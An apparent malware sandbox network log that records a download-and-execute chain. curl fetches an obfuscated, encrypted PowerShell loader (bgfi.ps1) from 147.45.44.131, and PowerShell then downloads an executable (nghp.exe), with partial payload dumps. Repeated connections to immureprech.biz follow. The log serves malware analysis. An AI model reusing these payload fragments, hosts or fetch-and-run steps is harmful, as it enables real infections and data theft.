                                                    Dec 12, 2024 17:34:02.948276043 CET49714443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:02.950812101 CET49714443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:02.950834036 CET44349714172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:02.999152899 CET49715443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:02.999193907 CET44349715172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:02.999362946 CET49715443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:02.999584913 CET49715443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:02.999605894 CET44349715172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:03.244616985 CET44349715172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:03.244895935 CET49715443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:03.245928049 CET49715443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:03.245949984 CET44349715172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:03.246385098 CET44349715172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:03.247373104 CET49715443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:03.247474909 CET49715443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:03.247494936 CET44349715172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:03.247569084 CET49715443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:03.247597933 CET49715443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:03.247636080 CET44349715172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:03.247782946 CET49715443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:03.248018026 CET49715443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:03.248060942 CET44349715172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:03.901530027 CET44349715172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:03.901839972 CET44349715172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:03.901868105 CET49715443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:03.902055025 CET49715443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:03.997996092 CET49716443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:03.998076916 CET44349716172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:03.998392105 CET49716443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:03.998624086 CET49716443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:03.998682022 CET44349716172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:04.255608082 CET44349716172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:04.255801916 CET49716443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:04.257364988 CET49716443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:04.257374048 CET44349716172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:04.257572889 CET44349716172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:04.258603096 CET49716443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:04.258603096 CET49716443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:04.258632898 CET44349716172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:04.877665043 CET44349716172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:04.877990007 CET49716443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:04.878014088 CET44349716172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:04.878139019 CET49716443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.299911022 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.299988985 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.300148964 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.300386906 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.300437927 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.548633099 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.548950911 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.549786091 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.549830914 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.550849915 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.551906109 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.552967072 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.553028107 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.553071022 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.553122044 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.553296089 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.553508997 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.553622007 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.553693056 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.553746939 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.554069042 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.554116011 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.554269075 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.554318905 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.554454088 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.554507017 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.554641962 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.554687023 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.554791927 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.554809093 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.554999113 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.555017948 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.555185080 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.555208921 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.555425882 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.555480957 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.555599928 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.555649042 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.555809021 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.555867910 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.555948973 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.555969954 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.556145906 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.556175947 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.556391954 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.556452036 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.556569099 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.556622982 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.556786060 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.556907892 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.557107925 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.557297945 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.557528973 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.557679892 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.557871103 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.558105946 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.558262110 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.598316908 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.598579884 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.598640919 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.598793030 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.598850965 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.598989010 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.599045038 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.599195004 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.599255085 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.599392891 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.599451065 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.599559069 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.599776030 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.599956036 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.600157976 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.600332975 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.600533962 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.600739956 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.600898981 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.601123095 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.601267099 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.601485014 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.601632118 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.601825953 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.642246962 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.642460108 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.642689943 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.642872095 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.643049002 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.643238068 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.643424988 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.643623114 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.643805027 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.686285019 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.686499119 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.686700106 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.686914921 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.730283022 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.784477949 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.784727097 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.784775019 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.784919024 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:05.784965992 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:05.898408890 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:08.334773064 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:08.335002899 CET44349717172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:08.335115910 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:08.335115910 CET49717443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:08.337677956 CET49718443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:08.337745905 CET44349718172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:08.337927103 CET49718443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:08.338100910 CET49718443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:08.338120937 CET44349718172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:08.579740047 CET44349718172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:08.579972982 CET49718443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:08.580851078 CET49718443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:08.580866098 CET44349718172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:08.581190109 CET44349718172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:08.582252979 CET49718443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:08.582252979 CET49718443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:08.582328081 CET44349718172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:09.472851992 CET44349718172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:09.473182917 CET44349718172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:09.473376036 CET49718443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:09.474729061 CET49718443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:09.474729061 CET49718443192.168.11.20172.67.207.38
                                                    Dec 12, 2024 17:34:09.474788904 CET44349718172.67.207.38192.168.11.20
                                                    Dec 12, 2024 17:34:09.474807024 CET44349718172.67.207.38192.168.11.20
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 12, 2024 17:33:58.764574051 CET5433453192.168.11.201.1.1.1
                                                    Dec 12, 2024 17:33:58.913463116 CET53543341.1.1.1192.168.11.20
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 12, 2024 17:33:58.764574051 CET192.168.11.201.1.1.10xc78dStandard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 12, 2024 17:33:58.913463116 CET1.1.1.1192.168.11.200xc78dNo error (0)immureprech.biz172.67.207.38A (IP address)IN (0x0001)false
                                                    Dec 12, 2024 17:33:58.913463116 CET1.1.1.1192.168.11.200xc78dNo error (0)immureprech.biz104.21.22.222A (IP address)IN (0x0001)false
                                                    • immureprech.biz
                                                    • 147.45.44.131
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.11.2049709147.45.44.131801844C:\Windows\SysWOW64\curl.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 12, 2024 17:33:55.587621927 CET194OUTGET /infopage/bgfi.ps1 HTTP/1.1
                                                    Host: 147.45.44.131
                                                    User-Agent: curl/7.55.1
                                                    Accept: */*
                                                    X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                    Dec 12, 2024 17:33:55.809194088 CET1289INHTTP/1.1 200 OK
                                                    Date: Thu, 12 Dec 2024 16:33:55 GMT
                                                    Server: Apache/2.4.52 (Ubuntu)
                                                    Last-Modified: Thu, 12 Dec 2024 14:54:49 GMT
                                                    ETag: "fde-62913e55b5974"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 4062
                                                    Data Raw: 0d 0a 24 47 78 47 74 62 41 35 67 36 50 20 3d 20 27 6c 6b 6a 31 4f 30 38 72 2b 72 77 43 42 42 4a 45 51 2b 50 48 72 30 49 46 4c 4d 43 43 71 43 66 39 42 59 4b 54 76 75 44 73 2b 4f 73 3d 27 0d 0a 24 63 50 49 6c 78 63 38 5a 6b 63 20 3d 20 27 41 6f 47 4b 72 4f 71 57 76 57 6d 55 64 4d 55 31 62 31 55 66 68 41 3d 3d 27 0d 0a 24 62 53 35 38 54 51 72 4f 73 4b 20 3d 20 27 6e 39 39 63 46 4d 35 34 4e 31 53 62 7a 44 6a 6d 34 59 6d 33 6b 2f 63 6c 71 2b 70 33 51 36 62 69 61 78 55 55 34 6c 5a 6c 30 5a 65 4e 4a 58 38 57 66 75 54 39 34 42 68 62 78 6d 54 73 78 55 6d 75 44 4a 4e 72 56 32 55 43 36 68 66 53 79 35 52 34 50 76 72 55 76 35 49 6b 36 56 71 4f 34 75 54 59 74 6b 2f 49 65 63 6c 65 67 75 62 6f 6a 41 78 74 46 42 38 36 48 49 6f 47 79 70 48 64 34 4e 70 41 5a 53 6d 58 68 77 4e 48 37 69 62 46 46 4d 77 4d 48 75 54 75 79 4a 6d 4e 73 55 53 47 77 47 34 38 36 2f 59 4a 6d 72 58 63 59 56 4c 53 4e 39 5a 64 2b 74 77 2b 62 6b 37 4a 73 41 33 64 44 59 37 6c 55 31 49 35 54 34 4c 6c 31 66 42 39 4b 58 6d 32 53 4f 52 6d 79 71 51 49 55 [TRUNCATED]
                                                    Data Ascii: $GxGtbA5g6P = 'lkj1O08r+rwCBBJEQ+PHr0IFLMCCqCf9BYKTvuDs+Os='$cPIlxc8Zkc = 'AoGKrOqWvWmUdMU1b1UfhA=='$bS58TQrOsK = 'n99cFM54N1SbzDjm4Ym3k/clq+p3Q6biaxUU4lZl0ZeNJX8WfuT94BhbxmTsxUmuDJNrV2UC6hfSy5R4PvrUv5Ik6VqO4uTYtk/IeclegubojAxtFB86HIoGypHd4NpAZSmXhwNH7ibFFMwMHuTuyJmNsUSGwG486/YJmrXcYVLSN9Zd+tw+bk7JsA3dDY7lU1I5T4Ll1fB9KXm2SORmyqQIUPXcREqKt6nssoWmwdBJCNPlRi9V9c0t3WYL1OhxVDrhWP8eJTHT4cAfrE6ph5F9XlOJNHNkgrYo9t06zHXuEUYupZSOC+mgMprq0qgushwBI2UHKhr4KFpySuCNl13Lk97M9Tt4bP3R2FApynJ8Es+nA5TIywJ/YbNVXXFecrCGi4vITP+eAdfo6/dPIymJBGvfnMNUmxs/xOOxKSQWNOcrnMOrRbnXkHMDL9l3fJg4O4EIGZEreMCYpwPNNwORWp/djz5/qdWmXDVKvIPrNhYUcvf/UYF1/lRZHt7ob1l3aYzUOTX186LRDp+GvUpya5K30tSCakxnaSfJS2IhKayIqC9UBOerlIKHQdhWN4zvDIjYQoQdq3zaNzeW4/GaSHcW/Mu8A9qSV6EdLhREmQ9Afu111FAOKmE1QWSCAHSiTbjVZtuUpMaMFd6wFd1aVzj8tw6tN3R6xgmIl2mF1ThKG+mCrpQ9J8IH+MS8Mksr3HHZc41Y+sj9D/kerAmdsWs1wP2/SvQ3CrexJym5k3NHxi0HJJYkqBcNYgd70LSydtOrRVYbIOCFN5mKja2HsINv/7mGdIIaAVFtlhscxqgr99xpHHTAM8Qaiyej74yHWohpVLoYDF8OOdJH2ueobbZ1U/TWvzxLcXxRBc6CykDt0hXdc+4c4Hu [TRUNCATED]
                                                    Dec 12, 2024 17:33:55.809232950 CET1289INData Raw: 4b 53 54 36 7a 43 34 77 6f 69 32 79 71 42 37 34 56 70 72 61 59 54 74 6d 46 44 2b 2b 4a 5a 55 74 51 64 34 6e 58 67 57 61 34 61 75 67 6f 6d 74 4d 51 30 68 62 79 50 6e 70 47 72 58 48 46 39 47 58 4a 75 46 72 57 51 33 44 55 34 65 59 4f 48 4d 38 68 41
                                                    Data Ascii: KST6zC4woi2yqB74VpraYTtmFD++JZUtQd4nXgWa4augomtMQ0hbyPnpGrXHF9GXJuFrWQ3DU4eYOHM8hARCZiDZjmdek6J2NBTUBqnQLYMuSX0LlfV4ySt4mtAysMidNeu0h3NEnD9CCQYRJ4C6jkS1cw7CHSZ/xfhg0KA1TsZDN4EnQ7W/OTTs8HikgOoIITOpyEzcdPsOf8x8SPvQxhcHS+tj/gypOX2Fqn5QrdY9IeOzHPW
                                                    Dec 12, 2024 17:33:55.809247017 CET1289INData Raw: 62 53 79 55 7a 33 6b 42 44 78 6c 51 78 76 6b 7a 4d 70 50 54 74 49 59 39 75 46 52 31 36 30 34 79 7a 44 46 59 79 52 45 6e 78 66 6b 5a 31 59 47 67 70 6a 46 39 50 62 58 42 4f 67 56 62 49 4c 64 62 79 76 58 7a 41 39 7a 6d 6c 47 75 5a 68 41 72 39 34 4d
                                                    Data Ascii: bSyUz3kBDxlQxvkzMpPTtIY9uFR1604yzDFYyREnxfkZ1YGgpjF9PbXBOgVbILdbyvXzA9zmlGuZhAr94M5ihRVlUPiVXFByLOLl5zp7vCI9C74Vznx9RMP3mo0qgfMOzFg0KYCxrr6ap4qAJjmeACRIlP/Ny0Rb5XSfu9pHwp4VTOkQh9JNLVWGvfJ71NGpGTlvielM4tqQFnwmj05IKoOQQaELNgBoAr4Aspjf/dE1X1jClUv
                                                    Dec 12, 2024 17:33:55.809257984 CET400INData Raw: 2c 20 5b 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 2e 43 72 79 70 74 6f 53 74 72 65 61 6d 4d 6f 64 65 5d 3a 3a 52 65 61 64 29 0d 0a 20 20 20 20 24 4a 6a 36 6e 48 72 7a 4e 67 56 20 3d 20 4e 65 77 2d 4f 62
                                                    Data Ascii: , [System.Security.Cryptography.CryptoStreamMode]::Read) $Jj6nHrzNgV = New-Object System.IO.StreamReader($h5EJ59bdUe) $RxXhhJcBdb = $Jj6nHrzNgV.ReadToEnd() $Jj6nHrzNgV.Close() $h5EJ59bdUe.Close() $LjPjMFgohB.Close()


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.11.2049710147.45.44.131805040C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 12, 2024 17:33:56.637471914 CET180OUTGET /infopage/nghp.exe HTTP/1.1
                                                    X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                    Host: 147.45.44.131
                                                    Connection: Keep-Alive
                                                    Dec 12, 2024 17:33:56.856739044 CET1289INHTTP/1.1 200 OK
                                                    Date: Thu, 12 Dec 2024 16:33:56 GMT
                                                    Server: Apache/2.4.52 (Ubuntu)
                                                    Last-Modified: Thu, 12 Dec 2024 14:33:42 GMT
                                                    ETag: "b200-6291399decf3b"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 45568
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-msdos-program
                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f4 ca 14 bd 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 0c 00 00 00 00 00 00 ee c3 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c c3 00 00 4f 00 00 00 00 e0 00 00 18 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 80 c3 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ `O H.text `.rsrc@@.reloc@BH"0S(rp(o(r3p(os%oo~o~(*(*0(rp(o(~((osso(rp(oo&o(r-p(oo&o%oo(rWp(oo(rqp(oo%%o &*(*0f(!o"iYpai
                                                    Dec 12, 2024 17:33:56.856750011 CET1289INData Raw: 0c 16 0d 16 13 04 2b 28 08 11 04 02 11 04 91 07 61 06 09 91 61 d2 9c 09 03 6f 23 00 00 0a 17 59 33 04 16 0d 2b 04 09 17 58 0d 11 04 17 58 13 04 11 04 02 8e 69 17 59 32 cf 12 02 02 8e 69 17 59 28 01 00 00 2b 08 2a 1e 02 28 16 00 00 0a 2a 1a 28 01
                                                    Data Ascii: +(aao#Y3+XXiY2iY(+*(*(*(*(*0L(rp(o(rp(o(rp(o*BSJBv4.0.30319l#~
                                                    Dec 12, 2024 17:33:56.856946945 CET1289INData Raw: 6c 69 62 00 41 64 64 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 53 70 65 63 69 61 6c 69 7a 65 64 00 47 65 74 4d 65 74 68 6f 64 00 43 6f 6d 70 69 6c 65 41 73 73 65 6d 62 6c 79 46 72 6f 6d 53 6f 75 72 63 65 00 67 65 74 5f 42 69 67
                                                    Data Ascii: libAddSystem.Collections.SpecializedGetMethodCompileAssemblyFromSourceget_BigEndianUnicodeInvokeGetTypeMethodBaseGuidAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAt
                                                    Dec 12, 2024 17:33:56.857002020 CET1289INData Raw: 63 00 6d 00 70 00 4f 00 5a 00 32 00 35 00 57 00 52 00 47 00 68 00 4b 00 64 00 6d 00 56 00 32 00 54 00 6a 00 68 00 53 00 4d 00 6d 00 74 00 31 00 4f 00 47 00 39 00 51 00 51 00 30 00 4a 00 76 00 62 00 6d 00 68 00 74 00 63 00 48 00 70 00 47 00 59 00
                                                    Data Ascii: cmpOZ25WRGhKdmV2TjhSMmt1OG9QQ0JvbmhtcHpGYjJHWXFQaUxoSnE=RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVV
                                                    Dec 12, 2024 17:33:56.857012033 CET1289INData Raw: 64 00 47 00 52 00 6d 00 4e 00 50 00 52 00 6a 00 46 00 4f 00 57 00 6b 00 70 00 6e 00 64 00 46 00 6c 00 47 00 61 00 46 00 6c 00 53 00 52 00 6d 00 78 00 6a 00 53 00 47 00 4e 00 70 00 64 00 46 00 6c 00 43 00 62 00 45 00 31 00 68 00 55 00 33 00 70 00
                                                    Data Ascii: dGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tB
                                                    Dec 12, 2024 17:33:56.857022047 CET1289INData Raw: 00 76 00 55 00 57 00 68 00 61 00 56 00 6b 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 46 00 70 00 44 00 55 00 57 00 68 00 61 00 56 00 6b 00 70 00 42 00 65 00 45 00 4e 00 43 00 62 00 47 00 39 00 50 00 55 00 55 00 4a 00 77 00 4e 00 45 00 52 00 46
                                                    Data Ascii: vUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNW
                                                    Dec 12, 2024 17:33:56.857042074 CET1289INData Raw: 61 00 56 00 6b 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 46 00 6c 00 6d 00 56 00 31 00 52 00 30 00 4c 00 30 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 33 00 52 00 32 00 59 00 55 00 4a 00 61 00 56 00 6b 00 70 00 72 00 53 00 56 00 5a 00 43 00
                                                    Data Ascii: aVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDM
